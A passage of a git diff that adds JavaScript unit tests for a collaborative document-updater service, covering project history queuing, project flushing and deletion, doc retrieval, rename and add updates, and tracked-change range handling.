+ } + this.rawUpdate.ranges = ranges + + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should pass "false" as the createdBlob field if not provided', async function () { + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should pass through the value of the createdBlob field', async function () { + this.rawUpdate.createdBlob = true + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: true, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + }) + + describe('queueResyncProjectStructure', function () { + it('should queue an update', function () {}) + }) + + describe('queueResyncDocContent', function () { + beforeEach(function () { + this.doc_id = 1234 + this.lines = ['one', 'two'] + this.ranges = { + changes: [{ op: { i: 'ne', p: 1 } }, { op: { d: 'deleted', p: 3 } }], + } + this.resolvedCommentIds = ['comment-1'] + this.version = 2 + this.pathname = '/path' + + this.ProjectHistoryRedisManager.promises.queueOps = sinon + .stub() + .resolves() + }) + + describe('with a good doc', function () { + beforeEach(async function () { + this.update = { + resyncDocContent: { + content: 'one\ntwo', + version: this.version, + }, + projectHistoryId: this.projectHistoryId, + path: this.pathname, + doc: this.doc_id, + meta: { ts: new Date() }, + } + + await this.ProjectHistoryRedisManager.promises.queueResyncDocContent( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathname, + false + ) + }) + + it('should check if the doc is too large', function () { + this.Limits.docIsTooLarge + .calledWith( + JSON.stringify(this.update).length, + this.lines, + this.settings.max_doc_length + ) + .should.equal(true) + }) + + it('should queue an update', function () { + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(this.update)) + .should.equal(true) + }) + }) + + describe('with a doc that is too large', function () { + beforeEach(async function () { + this.Limits.docIsTooLarge.returns(true) + await expect( + this.ProjectHistoryRedisManager.promises.queueResyncDocContent( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathname, + false + ) + ).to.be.rejected + }) + + it('should not queue an update if the doc is too large', function () { + this.ProjectHistoryRedisManager.promises.queueOps.called.should.equal( + false + ) + }) + }) + + describe('when history ranges support is enabled', function () { + beforeEach(async function () { + this.update = { + resyncDocContent: { + content: 'onedeleted\ntwo', + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + }, + projectHistoryId: this.projectHistoryId, + path: this.pathname, + doc: this.doc_id, + meta: { ts: new Date() }, + } + + await this.ProjectHistoryRedisManager.promises.queueResyncDocContent( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathname, + true + ) + }) + + it('should include tracked deletes in the update', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWithExactly( + this.project_id, + JSON.stringify(this.update) + ) + }) + + it('should check the doc length without tracked deletes', function () { + this.Limits.docIsTooLarge.should.have.been.calledWith( + JSON.stringify(this.update).length, + this.lines, + this.settings.max_doc_length + ) + }) + + it('should queue an update', function () { + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(this.update)) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/flushAndDeleteProjectTests.js b/services/document-updater/test/unit/js/ProjectManager/flushAndDeleteProjectTests.js new file mode 100644 index 0000000..b92fc8b --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/flushAndDeleteProjectTests.js @@ -0,0 +1,157 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('ProjectManager - flushAndDeleteProject', function () { + beforeEach(function () { + let Timer + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = { + flushProjectChanges: sinon.stub().callsArg(2), + }), + './LockManager': this.LockManager, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.project_id = 'project-id-123' + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushAndDeleteDocWithLock = sinon.stub().callsArg(3) + return this.ProjectManager.flushAndDeleteProjectWithLocks( + this.project_id, + {}, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should get the doc ids in the project', function () { + return this.RedisManager.getDocIdsInProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should delete each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, docId, {}) + .should.equal(true) + ) + }) + + it('should flush project history', function () { + return this.HistoryManager.flushProjectChanges + .calledWith(this.project_id, {}) + .should.equal(true) + }) + + it('should call the callback without error', function () { + return this.callback.calledWith(null).should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + return describe('when a doc errors', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushAndDeleteDocWithLock = sinon.spy( + (projectId, docId, options, callback) => { + if (docId === 'doc-id-1') { + return callback( + (this.error = new Error('oops, something went wrong')) + ) + } else { + return callback() + } + } + ) + return this.ProjectManager.flushAndDeleteProjectWithLocks( + this.project_id, + {}, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should still flush each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, docId, {}) + .should.equal(true) + ) + }) + + it('should still flush project history', function () { + return this.HistoryManager.flushProjectChanges + .calledWith(this.project_id, {}) + .should.equal(true) + }) + + it('should record the error', function () { + return this.logger.error + .calledWith( + { err: this.error, projectId: this.project_id, docId: 'doc-id-1' }, + 'error deleting doc' + ) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/flushProjectTests.js b/services/document-updater/test/unit/js/ProjectManager/flushProjectTests.js new file mode 100644 index 0000000..7eea0d2 --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/flushProjectTests.js @@ -0,0 +1,145 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('ProjectManager - flushProject', function () { + beforeEach(function () { + let Timer + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = {}), + './LockManager': this.LockManager, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.project_id = 'project-id-123' + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushDocIfLoadedWithLock = sinon.stub().callsArg(2) + return this.ProjectManager.flushProjectWithLocks( + this.project_id, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should get the doc ids in the project', function () { + return this.RedisManager.getDocIdsInProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should flush each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushDocIfLoadedWithLock + .calledWith(this.project_id, docId) + .should.equal(true) + ) + }) + + it('should call the callback without error', function () { + return this.callback.calledWith(null).should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + return describe('when a doc errors', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushDocIfLoadedWithLock = sinon.spy( + (projectId, docId, callback) => { + if (callback == null) { + callback = function () {} + } + if (docId === 'doc-id-1') { + return callback( + (this.error = new Error('oops, something went wrong')) + ) + } else { + return callback() + } + } + ) + return this.ProjectManager.flushProjectWithLocks( + this.project_id, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should still flush each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushDocIfLoadedWithLock + .calledWith(this.project_id, docId) + .should.equal(true) + ) + }) + + it('should record the error', function () { + return this.logger.error + .calledWith( + { err: this.error, projectId: this.project_id, docId: 'doc-id-1' }, + 'error flushing doc' + ) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/getProjectDocsTests.js b/services/document-updater/test/unit/js/ProjectManager/getProjectDocsTests.js new file mode 100644 index 0000000..1a04d71 --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/getProjectDocsTests.js @@ -0,0 +1,224 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors.js') + +describe('ProjectManager - getProjectDocsAndFlushIfOld', function () { + beforeEach(function () { + let Timer + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = {}), + './LockManager': this.LockManager, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + './Errors': Errors, + }, + }) + this.project_id = 'project-id-123' + this.callback = sinon.stub() + return (this.doc_versions = [111, 222, 333]) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.doc_lines = [ + ['aaa', 'aaa'], + ['bbb', 'bbb'], + ['ccc', 'ccc'], + ] + this.docs = [ + { + _id: this.doc_ids[0], + lines: this.doc_lines[0], + v: this.doc_versions[0], + }, + { + _id: this.doc_ids[1], + lines: this.doc_lines[1], + v: this.doc_versions[1], + }, + { + _id: this.doc_ids[2], + lines: this.doc_lines[2], + v: this.doc_versions[2], + }, + ] + this.RedisManager.checkOrSetProjectState = sinon + .stub() + .callsArgWith(2, null) + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.getDocAndFlushIfOldWithLock = sinon.stub() + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, this.doc_ids[0]) + .callsArgWith(2, null, this.doc_lines[0], this.doc_versions[0]) + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, this.doc_ids[1]) + .callsArgWith(2, null, this.doc_lines[1], this.doc_versions[1]) + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, this.doc_ids[2]) + .callsArgWith(2, null, this.doc_lines[2], this.doc_versions[2]) + return this.ProjectManager.getProjectDocsAndFlushIfOld( + this.project_id, + this.projectStateHash, + this.excludeVersions, + (error, docs) => { + this.callback(error, docs) + return done() + } + ) + }) + + it('should check the project state', function () { + return this.RedisManager.checkOrSetProjectState + .calledWith(this.project_id, this.projectStateHash) + .should.equal(true) + }) + + it('should get the doc ids in the project', function () { + return this.RedisManager.getDocIdsInProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should call the callback without error', function () { + return this.callback.calledWith(null, this.docs).should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when the state does not match', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.checkOrSetProjectState = sinon + .stub() + .callsArgWith(2, null, true) + return this.ProjectManager.getProjectDocsAndFlushIfOld( + this.project_id, + this.projectStateHash, + this.excludeVersions, + (error, docs) => { + this.callback(error, docs) + return done() + } + ) + }) + + it('should check the project state', function () { + return this.RedisManager.checkOrSetProjectState + .calledWith(this.project_id, this.projectStateHash) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Errors.ProjectStateChangedError)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when a doc errors', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.checkOrSetProjectState = sinon + .stub() + .callsArgWith(2, null) + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.getDocAndFlushIfOldWithLock = sinon.stub() + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, 'doc-id-1') + .callsArgWith(2, null, ['test doc content'], this.doc_versions[1]) + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, 'doc-id-2') + .callsArgWith(2, (this.error = new Error('oops'))) // trigger an error + return this.ProjectManager.getProjectDocsAndFlushIfOld( + this.project_id, + this.projectStateHash, + this.excludeVersions, + (error, docs) => { + this.callback(error) + return done() + } + ) + }) + + it('should record the error', function () { + return this.logger.error + .calledWith( + { err: this.error, projectId: this.project_id, docId: 'doc-id-2' }, + 'error getting project doc lines in getProjectDocsAndFlushIfOld' + ) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + return describe('clearing the project state with clearProjectState', function () { + beforeEach(function (done) { + this.RedisManager.clearProjectState = sinon.stub().callsArg(1) + return this.ProjectManager.clearProjectState(this.project_id, error => { + this.callback(error) + return done() + }) + }) + + it('should clear the project state', function () { + return this.RedisManager.clearProjectState + .calledWith(this.project_id) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/updateProjectTests.js b/services/document-updater/test/unit/js/ProjectManager/updateProjectTests.js new file mode 100644 index 0000000..6db8317 --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/updateProjectTests.js @@ -0,0 +1,417 @@ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') +const _ = require('lodash') + +describe('ProjectManager', function () { + beforeEach(function () { + this.RedisManager = {} + this.ProjectHistoryRedisManager = { + queueRenameEntity: sinon.stub().yields(), + queueAddEntity: sinon.stub().yields(), + } + this.DocumentManager = { + renameDocWithLock: sinon.stub().yields(), + } + this.HistoryManager = { + flushProjectChangesAsync: sinon.stub(), + shouldFlushHistoryOps: sinon.stub().returns(false), + } + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.Metrics = { + Timer: class Timer {}, + } + this.Metrics.Timer.prototype.done = sinon.stub() + + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': this.RedisManager, + './ProjectHistoryRedisManager': this.ProjectHistoryRedisManager, + './DocumentManager': this.DocumentManager, + './HistoryManager': this.HistoryManager, + './LockManager': this.LockManager, + './Metrics': this.Metrics, + }, + }) + + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.user_id = 'user-id-123' + this.version = 1234567 + this.source = 'editor' + this.callback = sinon.stub() + }) + + describe('updateProjectWithLocks', function () { + describe('rename operations', function () { + beforeEach(function () { + this.firstDocUpdate = { + type: 'rename-doc', + id: 1, + pathname: 'foo', + newPathname: 'foo', + } + this.secondDocUpdate = { + type: 'rename-doc', + id: 2, + pathname: 'bar', + newPathname: 'bar2', + } + this.firstFileUpdate = { + type: 'rename-file', + id: 2, + pathname: 'bar', + newPathname: 'bar2', + } + this.updates = [ + this.firstDocUpdate, + this.secondDocUpdate, + this.firstFileUpdate, + ] + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should rename the docs in the updates', function () { + const firstDocUpdateWithVersion = _.extend({}, this.firstDocUpdate, { + version: `${this.version}.0`, + }) + const secondDocUpdateWithVersion = _.extend( + {}, + this.secondDocUpdate, + { version: `${this.version}.1` } + ) + this.DocumentManager.renameDocWithLock + .calledWith( + this.project_id, + this.firstDocUpdate.id, + this.user_id, + firstDocUpdateWithVersion, + this.projectHistoryId + ) + .should.equal(true) + this.DocumentManager.renameDocWithLock + .calledWith( + this.project_id, + this.secondDocUpdate.id, + this.user_id, + secondDocUpdateWithVersion, + this.projectHistoryId + ) + .should.equal(true) + }) + + it('should rename the files in the updates', function () { + const firstFileUpdateWithVersion = _.extend( + {}, + this.firstFileUpdate, + { version: `${this.version}.2` } + ) + this.ProjectHistoryRedisManager.queueRenameEntity + .calledWith( + this.project_id, + this.projectHistoryId, + 'file', + this.firstFileUpdate.id, + this.user_id, + firstFileUpdateWithVersion, + this.source + ) + .should.equal(true) + }) + + it('should not flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(false) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + + describe('when renaming a doc fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.DocumentManager.renameDocWithLock.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when renaming a file fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.ProjectHistoryRedisManager.queueRenameEntity.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('with enough ops to flush', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps.returns(true) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(true) + }) + }) + }) + + describe('add operations', function () { + beforeEach(function () { + this.firstDocUpdate = { + type: 'add-doc', + id: 1, + docLines: 'a\nb', + } + this.secondDocUpdate = { + type: 'add-doc', + id: 2, + docLines: 'a\nb', + } + this.firstFileUpdate = { + type: 'add-file', + id: 3, + url: 'filestore.example.com/2', + } + this.secondFileUpdate = { + type: 'add-file', + id: 4, + url: 'filestore.example.com/3', + } + this.updates = [ + this.firstDocUpdate, + this.secondDocUpdate, + this.firstFileUpdate, + this.secondFileUpdate, + ] + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should add the docs in the updates', function () { + const firstDocUpdateWithVersion = _.extend({}, this.firstDocUpdate, { + version: `${this.version}.0`, + }) + const secondDocUpdateWithVersion = _.extend( + {}, + this.secondDocUpdate, + { version: `${this.version}.1` } + ) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(0) + .calledWith( + this.project_id, + this.projectHistoryId, + 'doc', + this.firstDocUpdate.id, + this.user_id, + firstDocUpdateWithVersion, + this.source + ) + .should.equal(true) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(1) + .calledWith( + this.project_id, + this.projectHistoryId, + 'doc', + this.secondDocUpdate.id, + this.user_id, + secondDocUpdateWithVersion, + this.source + ) + .should.equal(true) + }) + + it('should add the files in the updates', function () { + const firstFileUpdateWithVersion = _.extend( + {}, + this.firstFileUpdate, + { version: `${this.version}.2` } + ) + const secondFileUpdateWithVersion = _.extend( + {}, + this.secondFileUpdate, + { version: `${this.version}.3` } + ) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(2) + .calledWith( + this.project_id, + this.projectHistoryId, + 'file', + this.firstFileUpdate.id, + this.user_id, + firstFileUpdateWithVersion, + this.source + ) + .should.equal(true) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(3) + .calledWith( + this.project_id, + this.projectHistoryId, + 'file', + this.secondFileUpdate.id, + this.user_id, + secondFileUpdateWithVersion, + this.source + ) + .should.equal(true) + }) + + it('should not flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(false) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + + describe('when adding a doc fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.ProjectHistoryRedisManager.queueAddEntity.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when adding a file fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.ProjectHistoryRedisManager.queueAddEntity.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('with enough ops to flush', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps.returns(true) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(true) + }) + }) + }) + + describe('when given an unknown operation type', function () { + beforeEach(function () { + this.updates = [{ type: 'brew-coffee' }] + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call back with an error', function () { + this.callback.calledWith(sinon.match.instanceOf(Error)).should.be.true + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/RangesManager/RangesManagerTests.js b/services/document-updater/test/unit/js/RangesManager/RangesManagerTests.js new file mode 100644 index 0000000..4053aaf --- /dev/null +++ b/services/document-updater/test/unit/js/RangesManager/RangesManagerTests.js @@ -0,0 +1,1089 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') + +const MODULE_PATH = '../../../../app/js/RangesManager.js' +const TEST_USER_ID = 'user-id-123' + +describe('RangesManager', function () { + beforeEach(function () { + this.RangesManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/metrics': (this.Metrics = { histogram: sinon.stub() }), + }, + }) + + this.doc_id = 'doc-id-123' + this.project_id = 'project-id-123' + this.user_id = TEST_USER_ID + }) + + describe('applyUpdate', function () { + beforeEach(function () { + this.ops = [{ i: 'two ', p: 4 }] + this.historyOps = [{ i: 'two ', p: 4, hpos: 4 }] + this.meta = { user_id: this.user_id } + this.updates = [{ meta: this.meta, op: this.ops }] + this.ranges = { + comments: makeRanges([{ c: 'three ', p: 4 }]), + changes: makeRanges([{ i: 'five', p: 15 }]), + } + this.newDocLines = ['one two three four five'] + // old is "one three four five" + }) + + describe('successfully', function () { + beforeEach(function () { + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return the modified the comments and changes', function () { + expect(this.result.rangesWereCollapsed).to.equal(false) + this.result.newRanges.comments[0].op.should.deep.equal({ + c: 'three ', + p: 8, + }) + this.result.newRanges.changes[0].op.should.deep.equal({ + i: 'five', + p: 19, + }) + }) + + it('should return unmodified updates for the history', function () { + expect(this.result.historyUpdates).to.deep.equal(this.updates) + }) + }) + + describe('with empty comments', function () { + beforeEach(function () { + this.ranges.comments = [] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return an object with no comments', function () { + // Save space in redis and don't store just {} + expect(this.result.newRanges.comments).to.be.undefined + }) + + it('should return unmodified updates for the history', function () { + expect(this.result.historyUpdates).to.deep.equal(this.updates) + }) + }) + + describe('with empty changes', function () { + beforeEach(function () { + this.ranges.changes = [] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return an object with no changes', function () { + // Save space in redis and don't store just {} + expect(this.result.newRanges.changes).to.be.undefined + }) + + it('should return unmodified updates for the history', function () { + expect(this.result.historyUpdates).to.deep.equal(this.updates) + }) + }) + + describe('with too many comments', function () { + beforeEach(function () { + this.RangesManager.MAX_COMMENTS = 2 + this.updates = makeUpdates([{ c: 'one', p: 0, t: 'thread-id-1' }]) + this.ranges = { + comments: makeRanges([ + { c: 'three ', p: 4, t: 'thread-id-2' }, + { c: 'four ', p: 10, t: 'thread-id-3' }, + ]), + changes: [], + } + }) + + it('should throw an error', function () { + expect(() => { + this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }).to.throw('too many comments or tracked changes') + }) + }) + + describe('with too many changes', function () { + beforeEach(function () { + this.RangesManager.MAX_CHANGES = 2 + this.updates = makeUpdates([{ i: 'one ', p: 0 }], { + tc: 'track-changes-id-yes', + }) + this.ranges = { + changes: makeRanges([ + { + i: 'three', + p: 4, + }, + { + i: 'four', + p: 10, + }, + ]), + comments: [], + } + this.newDocLines = ['one two three four'] + }) + + it('should throw an error', function () { + expect(() => { + this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }).to.throw('too many comments or tracked changes') + }) + }) + + describe('inconsistent changes', function () { + beforeEach(function () { + this.updates = makeUpdates([{ c: "doesn't match", p: 0 }]) + }) + + it('should throw an error', function () { + expect(() 